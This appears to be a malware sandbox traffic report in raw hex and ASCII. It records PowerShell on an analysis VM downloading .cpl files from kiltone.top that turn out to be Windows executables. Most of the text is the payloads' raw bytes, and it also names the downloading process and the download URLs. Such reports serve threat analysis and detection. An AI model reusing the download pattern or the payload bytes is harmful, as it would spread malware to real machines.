                                                                                                                                                2024-12-16 08:54:10 UTC9640INData Raw: 42 6f 78 5b 30 2e 30 20 30 2e 30 20 35 34 2e 30 20 31 31 2e 35 32 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 31 36 39 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 38 36 2e 32 38 20 31 31 2e 35 32 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20
                                                                                                                                                Data Ascii: Box[0.0 0.0 54.0 11.52]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1169 0 obj<</BBox[0.0 0.0 86.28 11.52]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0
                                                                                                                                                2024-12-16 08:54:10 UTC16384INData Raw: ee 61 2a 2c 16 35 a4 88 e3 4a 38 95 ab ae 41 3a e0 41 c9 14 72 66 b4 72 20 fc e7 ea 79 a6 87 1f 95 a2 c7 7a 58 1b a3 6a 05 82 69 7a 51 73 e8 36 5c f0 2d 24 d1 81 a7 52 e5 b1 40 41 42 d8 79 a8 73 19 ab f0 41 a5 98 82 c9 73 21 8f cc 52 ab 29 84 03 7c 8a 3c aa cc 95 a7 e7 20 78 5f b3 47 78 a2 e5 1a 2c 4c 70 b8 62 4d 86 59 81 1f 8a e0 37 d7 88 0d b1 02 32 9b e8 32 6e 15 71 85 e3 ef 18 1b 8b 88 82 96 90 6c b0 49 62 c0 0b 94 43 02 5e 91 4e 97 66 17 78 f6 0e 56 c2 bf c6 af bb 3c 13 7a 15 19 48 4d 50 23 34 2d 14 13 cc 8e 88 29 36 e5 94 08 23 04 05 82 68 d0 7b b4 23 a2 9f 28 0b 3c db c1 52 e8 21 28 90 4e 98 92 bd 10 b7 25 70 29 92 0c 97 60 78 f4 fa 2d 32 44 ac 65 08 a4 db 38 fb 76 26 60 8b 25 09 69 2a 9a 47 8f 00 f9 dc 52 5d 61 6f 48 4e d1 a8 f5 60 67 8b ec 00 5a
                                                                                                                                                Data Ascii: a*,5J8A:Arfr yzXjizQs6\-$R@ABysAs!R)|< x_Gx,LpbMY722nqlIbC^NfxV<zHMP#4-)6#h{#(<R!(N%p)`x-2De8v&`%i*GR]aoHN`gZ


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                4192.168.2.124972120.198.119.84443
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-16 08:54:10 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 36 56 77 50 6b 4c 41 36 30 79 6e 65 71 52 78 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 37 33 63 34 36 30 64 62 62 34 66 31 36 31 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: 56VwPkLA60yneqRx.1Context: 173c460dbb4f1610
                                                                                                                                                2024-12-16 08:54:10 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                2024-12-16 08:54:10 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 35 36 56 77 50 6b 4c 41 36 30 79 6e 65 71 52 78 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 37 33 63 34 36 30 64 62 62 34 66 31 36 31 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 53 54 48 6b 76 4f 78 66 46 71 49 32 55 72 6f 50 5a 68 65 77 65 55 46 53 6e 46 46 57 6b 46 35 74 43 7a 34 55 62 68 59 42 75 31 64 62 57 64 48 67 69 66 7a 72 44 51 43 57 46 6c 59 45 51 6b 36 4b 65 56 76 52 73 31 77 2f 44 46 32 4b 55 34 4d 33 68 4e 50 39 41 38 6e 39 74 65 73 66 6c 76 4e 76 4e 2f 41 6a 38 35 35 69 44 57 70 61
                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 56VwPkLA60yneqRx.2Context: 173c460dbb4f1610<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVSTHkvOxfFqI2UroPZheweUFSnFFWkF5tCz4UbhYBu1dbWdHgifzrDQCWFlYEQk6KeVvRs1w/DF2KU4M3hNP9A8n9tesflvNvN/Aj855iDWpa
                                                                                                                                                2024-12-16 08:54:10 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 35 36 56 77 50 6b 4c 41 36 30 79 6e 65 71 52 78 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 37 33 63 34 36 30 64 62 62 34 66 31 36 31 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: BND 3 CON\QOS 56MS-CV: 56VwPkLA60yneqRx.3Context: 173c460dbb4f1610
                                                                                                                                                2024-12-16 08:54:11 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                2024-12-16 08:54:11 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6a 39 68 6e 2f 47 4b 74 35 45 75 44 70 37 65 59 57 44 45 4e 56 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                Data Ascii: MS-CV: j9hn/GKt5EuDp7eYWDENVA.0Payload parsing failed.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.124972445.125.67.1684437856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-16 08:54:11 UTC172OUTGET /stelin/rwcla.cpl HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                Host: kiltone.top
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-16 08:54:12 UTC253INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Mon, 16 Dec 2024 08:54:11 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 211656
                                                                                                                                                Last-Modified: Fri, 13 Dec 2024 23:55:16 GMT
                                                                                                                                                Connection: close
                                                                                                                                                ETag: "675cc964-33ac8"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                2024-12-16 08:54:12 UTC16131INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 71 8c 42 de 35 ed 2c 8d 35 ed 2c 8d 35 ed 2c 8d 46 8f 2f 8c 38 ed 2c 8d 46 8f 29 8c ac ed 2c 8d 46 8f 28 8c 23 ed 2c 8d 67 98 28 8c 3a ed 2c 8d 67 98 2f 8c 20 ed 2c 8d 67 98 29 8c 70 ed 2c 8d 46 8f 2d 8c 36 ed 2c 8d 35 ed 2d 8d 4a ed 2c 8d ff 98 25 8c 37 ed 2c 8d ff 98 d3 8d 34 ed 2c 8d ff 98 2e 8c 34 ed 2c 8d 52 69 63 68 35 ed 2c 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$qB5,5,5,F/8,F),F(#,g(:,g/ ,g)p,F-6,5-J,%7,4,.4,Rich5,
                                                                                                                                                2024-12-16 08:54:12 UTC16384INData Raw: 6a ff 68 1d 0d 02 10 64 a1 00 00 00 00 50 81 ec a0 00 00 00 a1 14 f0 02 10 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 75 08 8d 4d e4 6a 00 89 75 ec c7 45 e0 00 00 00 00 e8 12 0d 00 00 c7 45 fc 00 00 00 00 8b 3d fc 0c 03 10 a1 dc 0c 03 10 89 45 e0 85 ff 75 2f 57 8d 4d e8 e8 f0 0c 00 00 39 3d fc 0c 03 10 75 10 a1 c0 fe 02 10 40 a3 c0 fe 02 10 a3 fc 0c 03 10 8d 4d e8 e8 28 0d 00 00 8b 3d fc 0c 03 10 8b 4e 04 3b 79 0c 73 10 8b 41 08 8b 34 b8 85 f6 0f 85 5d 01 00 00 eb 02 33 f6 80 79 14 00 74 10 e8 17 10 00 00 3b 78 0c 73 0e 8b 40 08 8b 34 b8 85 f6 0f 85 3b 01 00 00 8b 45 e0 85 c0 74 07 8b f0 e9 2d 01 00 00 6a 18 e8 28 2f 00 00 8b f0 83 c4 04 89 75 e8 c6 45 fc 01 0f 57 c0 8b 4d ec 0f 11 06 66 0f d6 46 10 8b 49 04 85 c9 74 0c 8b 41 18 85 c0 75 0a 8d
                                                                                                                                                Data Ascii: jhdP3EVWPEduMjuEE=Eu/WM9=u@M(=N;ysA4]3yt;xs@4;Et-j(/uEWMfFItAu
                                                                                                                                                2024-12-16 08:54:12 UTC16384INData Raw: 00 10 89 4d f8 89 45 fc 64 a1 00 00 00 00 89 45 e8 8d 45 e8 64 a3 00 00 00 00 ff 75 18 51 ff 75 10 e8 c7 2c 00 00 8b c8 8b 45 e8 64 a3 00 00 00 00 8b c1 c9 c3 55 8b ec 83 ec 40 53 81 7d 08 23 01 00 00 75 12 b8 02 8c 00 10 8b 4d 0c 89 01 33 c0 40 e9 d1 00 00 00 83 65 c0 00 c7 45 c4 4e 8d 00 10 a1 14 f0 02 10 8d 4d c0 33 c1 89 45 c8 8b 45 18 89 45 cc 8b 45 0c 89 45 d0 8b 45 1c 89 45 d4 8b 45 20 89 45 d8 83 65 dc 00 83 65 e0 00 83 65 e4 00 89 65 dc 89 6d e0 64 a1 00 00 00 00 89 45 c0 8d 45 c0 64 a3 00 00 00 00 8b 45 08 ff 30 e8 7f 7b 01 00 59 8b 4d 08 89 01 c7 45 f8 01 00 00 00 8b 45 08 89 45 e8 8b 45 10 89 45 ec e8 bd 1d 00 00 8b 40 08 89 45 fc a1 38 11 02 10 89 45 f4 8b 4d fc ff 55 f4 8b 45 fc 89 45 f0 8d 45 e8 50 8b 45 08 ff 30 ff 55 f0 59 59 83 65 f8 00
                                                                                                                                                Data Ascii: MEdEEduQu,EdU@S}#uM3@eENM3EEEEEEEE EeeeemdEEdE0{YMEEEEE@E8EMUEEEPE0UYYe
                                                                                                                                                2024-12-16 08:54:12 UTC16384INData Raw: 50 8d 45 f8 53 50 e8 af 5f 00 00 8b 46 20 83 c4 28 c1 e8 05 5b a8 01 74 13 83 7e 28 00 75 0d ff 76 08 ff 76 34 e8 7f f7 ff ff 59 59 8a 46 31 3c 67 74 04 3c 47 75 17 8b 46 20 c1 e8 05 a8 01 75 0d ff 76 08 ff 76 34 e8 d1 f6 ff ff 59 59 8b 46 34 80 38 2d 75 08 83 4e 20 40 40 89 46 34 8b 56 34 8a 02 3c 69 74 0c 3c 49 74 08 3c 6e 74 04 3c 4e 75 08 83 66 20 f7 c6 46 31 73 8d 7a 01 8a 0a 42 84 c9 75 f9 2b d7 b0 01 5f 89 56 38 5e 8b e5 5d c3 8b ff 56 8b f1 57 ff 76 2c 0f b6 46 31 50 ff 76 04 ff 36 e8 c5 f3 ff ff 83 c4 10 8d 7e 40 84 c0 74 39 83 46 14 04 8b 46 14 53 8b 9f 04 04 00 00 0f b7 40 fc 85 db 75 02 8b df 50 8b cf e8 04 f3 ff ff 50 8d 46 38 53 50 e8 0f 50 00 00 83 c4 10 5b 85 c0 74 25 c6 46 30 01 eb 1f 8b 8f 04 04 00 00 85 c9 75 02 8b cf 83 46 14 04 8b 46
                                                                                                                                                Data Ascii: PESP_F ([t~(uvv4YYF1<gt<GuF uvv4YYF48-uN @@F4V4<it<It<nt<Nuf F1szBu+_V8^]VWv,F1Pv6~@t9FFS@uPPF8SPP[t%F0uFF
                                                                                                                                                2024-12-16 08:54:12 UTC16384INData Raw: 33 c0 5f 5b 5e 8b e5 5d c3 8b ff 55 8b ec 83 ec 1c a1 14 f0 02 10 33 c5 89 45 fc 8b c1 89 45 e8 57 8b 00 8b 38 85 ff 75 08 83 c8 ff e9 ed 00 00 00 53 8b 1d 14 f0 02 10 8b d3 56 8b 37 83 e2 1f 8b 7f 04 33 f3 8b ca 33 fb d3 ce d3 cf 85 f6 0f 84 c5 00 00 00 83 fe ff 0f 84 bc 00 00 00 6a 20 59 2b ca 89 75 f4 33 c0 89 7d f0 d3 c8 33 c3 89 45 ec 83 ef 04 3b fe 72 68 8b 0f 3b c8 74 f3 33 cb 89 07 89 4d f8 8b ca 8b 5d f8 d3 cb 8b cb ff 15 38 11 02 10 ff d3 8b 45 e8 8b 1d 14 f0 02 10 8b d3 83 e2 1f 8b 00 8b 00 8b 08 8b 40 04 33 cb 89 4d f8 33 c3 8b ca d3 4d f8 d3 c8 8b 4d f8 89 45 e4 3b 4d f4 75 0b 3b 45 f0 8b 45 ec 74 a3 8b 45 e4 89 45 f0 8b f8 8b 45 ec 8b f1 89 4d f4 eb 91 83 fe ff 74 0d 56 e8 13 0d 00 00 8b 1d 14 f0 02 10 59 8b c3 33 d2 83 e0 1f 6a 20 59 2b c8
                                                                                                                                                Data Ascii: 3_[^]U3EEW8uSV733j Y+u3}3E;rh;t3M]8E@3M3MME;Mu;EEtEEEMtVY3j Y+
                                                                                                                                                2024-12-16 08:54:12 UTC16384INData Raw: 00 00 83 c4 10 c3 68 54 52 02 10 68 4c 52 02 10 68 54 52 02 10 6a 0f e8 34 01 00 00 83 c4 10 c3 68 9c 52 02 10 68 94 52 02 10 68 9c 52 02 10 6a 13 e8 1a 01 00 00 83 c4 10 c3 68 d0 52 02 10 68 c8 52 02 10 68 d0 52 02 10 6a 15 e8 00 01 00 00 83 c4 10 c3 68 b8 52 02 10 68 b0 52 02 10 68 b8 52 02 10 6a 14 e8 e6 00 00 00 83 c4 10 c3 68 ec 52 02 10 68 e4 52 02 10 68 ec 52 02 10 6a 16 e8 cc 00 00 00 83 c4 10 c3 8b ff 55 8b ec 51 53 56 57 8b 7d 08 e9 a1 00 00 00 8b 1f 8d 04 9d e8 0a 03 10 8b 30 89 45 fc 85 f6 74 0b 83 fe ff 0f 84 83 00 00 00 eb 7d 8b 1c 9d 50 4c 02 10 68 00 08 00 00 6a 00 53 ff 15 a8 10 02 10 8b f0 85 f6 75 50 ff 15 04 10 02 10 83 f8 57 75 35 6a 07 68 50 51 02 10 53 e8 dc cc ff ff 83 c4 0c 85 c0 74 21 6a 07 68 60 51 02 10 53 e8 c8 cc ff ff 83 c4
                                                                                                                                                Data Ascii: hTRhLRhTRj4hRhRhRjhRhRhRjhRhRhRjhRhRhRjUQSVW}0Et}PLhjSuPWu5jhPQSt!jh`QS
                                                                                                                                                2024-12-16 08:54:12 UTC16384INData Raw: 58 c5 66 0f 14 c0 66 0f 59 f0 f2 0f 59 e0 66 0f 59 c0 66 0f 58 fe 66 0f 59 f8 f2 0f 59 c3 66 0f 70 f7 ee f2 0f 59 c7 66 0f 70 eb ee f2 0f 59 f3 f2 0f 59 e3 66 0f 6e f9 66 0f 73 f7 2d 66 0f 6e d2 66 0f 76 c9 66 0f f3 ca f2 0f 58 c5 f2 0f 58 c6 66 0f 54 cb f2 0f 58 c4 66 0f 57 f6 66 0f 76 e4 66 0f f3 e2 f2 0f 5c d9 f2 0f 10 d1 f2 0f 58 c8 66 0f 54 cc 66 0f c4 f7 03 5f f2 0f 5c d1 f2 0f 58 c2 f2 0f 58 c3 83 fe 00 7f 4e 5e f2 0f 59 c7 f2 0f 59 cf f2 0f 58 c1 f2 0f 59 f0 f2 0f 58 c6 66 0f c5 c0 03 25 f0 7f 00 00 ba 18 00 00 00 3d f0 7f 00 00 0f 84 10 fe ff ff ba 19 00 00 00 83 f8 00 0f 84 02 fe ff ff 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 5e f2 0f 58 c1 f2 0f 59 c7 f2 0f 59 f0 f2 0f 58 c6 66 0f c5 c0 03 25 f0 7f 00 00 ba 18 00 00 00 3d f0 7f 00 00
                                                                                                                                                Data Ascii: XffYYfYfXfYYfpYfpYYfnfs-fnfvfXXfTXfWfvf\XfTf_\XXN^YYXYXf%=fD$D$^XYYXf%=
                                                                                                                                                2024-12-16 08:54:12 UTC16384INData Raw: 00 57 8d 45 ec 6a 02 50 e8 89 8e ff ff 83 c4 3c 0b c3 f7 d8 1a c0 5f 5e fe c0 5b 8b e5 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 0f 84 d0 00 00 00 6a 07 56 e8 31 fd ff ff 8d 46 1c 6a 07 50 e8 26 fd ff ff 8d 46 38 6a 0c 50 e8 1b fd ff ff 8d 46 68 6a 0c 50 e8 10 fd ff ff 8d 86 98 00 00 00 6a 02 50 e8 02 fd ff ff ff b6 a0 00 00 00 e8 8d 4d ff ff ff b6 a4 00 00 00 e8 82 4d ff ff ff b6 a8 00 00 00 e8 77 4d ff ff 8d 86 b4 00 00 00 6a 07 50 e8 d3 fc ff ff 8d 86 d0 00 00 00 6a 07 50 e8 c5 fc ff ff 83 c4 44 8d 86 ec 00 00 00 6a 0c 50 e8 b4 fc ff ff 8d 86 1c 01 00 00 6a 0c 50 e8 a6 fc ff ff 8d 86 4c 01 00 00 6a 02 50 e8 98 fc ff ff ff b6 54 01 00 00 e8 23 4d ff ff ff b6 58 01 00 00 e8 18 4d ff ff ff b6 5c 01 00 00 e8 0d 4d ff ff ff b6 60 01 00 00 e8 02 4d ff ff 83 c4
                                                                                                                                                Data Ascii: WEjP<_^[]UVujV1FjP&F8jPFhjPjPMMwMjPjPDjPjPLjPT#MXM\M`M
                                                                                                                                                2024-12-16 08:54:12 UTC16384INData Raw: e9 48 11 fe ff 8d 4d bc e9 b0 1e fe ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a 98 33 c8 e8 9a 6f fe ff 8b 4a fc 33 c8 e8 90 6f fe ff b8 c4 da 02 10 e9 af 82 fe ff cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a fc 33 c8 e8 6f 6f fe ff b8 00 d8 02 10 e9 8e 82 fe ff cc cc cc 8d 4d e8 e9 68 27 fe ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a e4 33 c8 e8 42 6f fe ff 8b 4a fc 33 c8 e8 38 6f fe ff b8 08 db 02 10 e9 57 82 fe ff cc cc cc cc cc cc cc cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 0f 6f fe ff b8 44 db 02 10 e9 2e 82 fe ff cc cc cc 8d 4d e0 e9 e6 4c fe ff 6a 18 8b 45 dc 50 e8 fd 6e fe ff 83 c4 08 c3 8d 4d e8 e9 31 46 fe ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a 90 33 c8 e8 cb 6e fe ff 8b 4a f8 33 c8 e8 c1 6e fe ff b8
                                                                                                                                                Data Ascii: HMT$BJ3oJ3oT$BJ3ooMh'T$BJ3BoJ38oWT$BJ3oD.MLjEPnM1FT$BJ3nJ3n
                                                                                                                                                2024-12-16 08:54:12 UTC16384INData Raw: 00 d0 4b 02 10 19 00 00 00 d8 4b 02 10 11 00 00 00 e0 4b 02 10 18 00 00 00 e8 4b 02 10 16 00 00 00 f0 4b 02 10 17 00 00 00 f8 4b 02 10 22 00 00 00 00 4c 02 10 23 00 00 00 04 4c 02 10 24 00 00 00 08 4c 02 10 25 00 00 00 0c 4c 02 10 26 00 00 00 14 4c 02 10 65 78 70 00 70 6f 77 00 6c 6f 67 00 6c 6f 67 31 30 00 00 00 73 69 6e 68 00 00 00 00 63 6f 73 68 00 00 00 00 74 61 6e 68 00 00 00 00 61 73 69 6e 00 00 00 00 61 63 6f 73 00 00 00 00 61 74 61 6e 00 00 00 00 61 74 61 6e 32 00 00 00 73 71 72 74 00 00 00 00 73 69 6e 00 63 6f 73 00 74 61 6e 00 63 65 69 6c 00 00 00 00 66 6c 6f 6f 72 00 00 00 66 61 62 73 00 00 00 00 6d 6f 64 66 00 00 00 00 6c 64 65 78 70 00 00 00 5f 63 61 62 73 00 00 00 5f 68 79 70 6f 74 00 00 66 6d 6f 64 00 00 00 00 66 72 65 78 70 00 00 00 5f 79
                                                                                                                                                Data Ascii: KKKKKK"L#L$L%L&Lexppowloglog10sinhcoshtanhasinacosatanatan2sqrtsincostanceilfloorfabsmodfldexp_cabs_hypotfmodfrexp_y


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.124973345.125.67.1684437216C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-16 08:54:31 UTC176OUTGET /stelin/Gosjeufon.cpl HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                Host: kiltone.top
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-16 08:54:32 UTC253INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Mon, 16 Dec 2024 08:54:31 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 902856
                                                                                                                                                Last-Modified: Fri, 13 Dec 2024 23:58:00 GMT
                                                                                                                                                Connection: close
                                                                                                                                                ETag: "675cca08-dc6c8"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                2024-12-16 08:54:32 UTC16131INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 84 7b 68 8b c0 1a 06 d8 c0 1a 06 d8 c0 1a 06 d8 b3 78 05 d9 d2 1a 06 d8 b3 78 03 d9 72 1a 06 d8 b3 78 02 d9 d7 1a 06 d8 92 6f 02 d9 d1 1a 06 d8 92 6f 05 d9 d8 1a 06 d8 92 6f 03 d9 9f 1a 06 d8 0a 6f 03 d9 e9 1a 06 d8 b3 78 00 d9 c1 1a 06 d8 b3 78 07 d9 cf 1a 06 d8 c0 1a 07 d8 71 1a 06 d8 0a 6f 0f d9 c1 1a 06 d8 0a 6f f9 d8 c1 1a 06 d8 c0 1a 91 d8 c1 1a 06 d8 0a 6f 04 d9 c1 1a 06
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.${hxxrxooooxxqooo
                                                                                                                                                2024-12-16 08:54:32 UTC16384INData Raw: 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c b3 48 00 c7 46 0c 04 00 00 00 e8 d0 17 01 00 c7 06 4c bc 48 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc 55 8b ec 6a ff 68 dd 33 48 00 64 a1 00 00 00 00 50 51 56 a1 34 61 4b 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 0f 57 c0 66 0f d6 46 04 ff 75 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c b3 48 00 c7 46 0c 00 00 00 00 e8 60 17 01 00 c7 06 b4 b3 48 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc 55 8b ec 6a ff 68 dd 33 48 00 64 a1 00 00 00 00 50 51 56 a1 34 61 4b 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 0f 57 c0 66 0f d6 46 04 ff 75 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c b3 48 00 c7 46 0c 02 00 00 00 e8 f0 16 01 00 c7 06
                                                                                                                                                Data Ascii: ENHFLHMdY^]Ujh3HdPQV4aK3PEduWfFuENHF`HMdY^]Ujh3HdPQV4aK3PEduWfFuENHF
                                                                                                                                                2024-12-16 08:54:32 UTC16384INData Raw: 45 fc 02 00 00 00 50 8b cf e8 ef 02 00 00 8d 77 18 50 8b ce e8 14 d7 00 00 8b 95 a4 fe ff ff 83 fa 10 72 2f 8b 8d 90 fe ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 9a 02 00 00 52 51 e8 68 4e 05 00 83 c4 08 83 7e 14 10 72 02 8b 36 ff 77 28 8b 85 00 ff ff ff 8d 8d 00 ff ff ff 56 ff 50 10 8d 45 cc 50 8b 85 00 ff ff ff 8d 8d 00 ff ff ff ff 50 18 6a 4c 8d 85 b0 fe ff ff 6a 00 50 e8 ec 6b 05 00 83 c4 0c c7 85 90 fe ff ff 00 00 00 00 8d 8d 90 fe ff ff c7 85 a0 fe ff ff 00 00 00 00 c7 85 a4 fe ff ff 0f 00 00 00 c6 85 90 fe ff ff 00 6a 00 68 5b 38 4a 00 e8 b2 fb 00 00 c6 45 fc 03 8d 8d 74 fe ff ff 6a 01 c7 85 74 fe ff ff 00 00 00 00 68 bc 3d 4a 00 c7 85 84 fe ff ff 00 00 00 00 c7 85 88 fe ff ff 0f 00 00 00 c6 85 74 fe ff
                                                                                                                                                Data Ascii: EPwPr/BrI#+RQhN~r6w(VPEPPjLjPkjh[8JEtjth=Jt
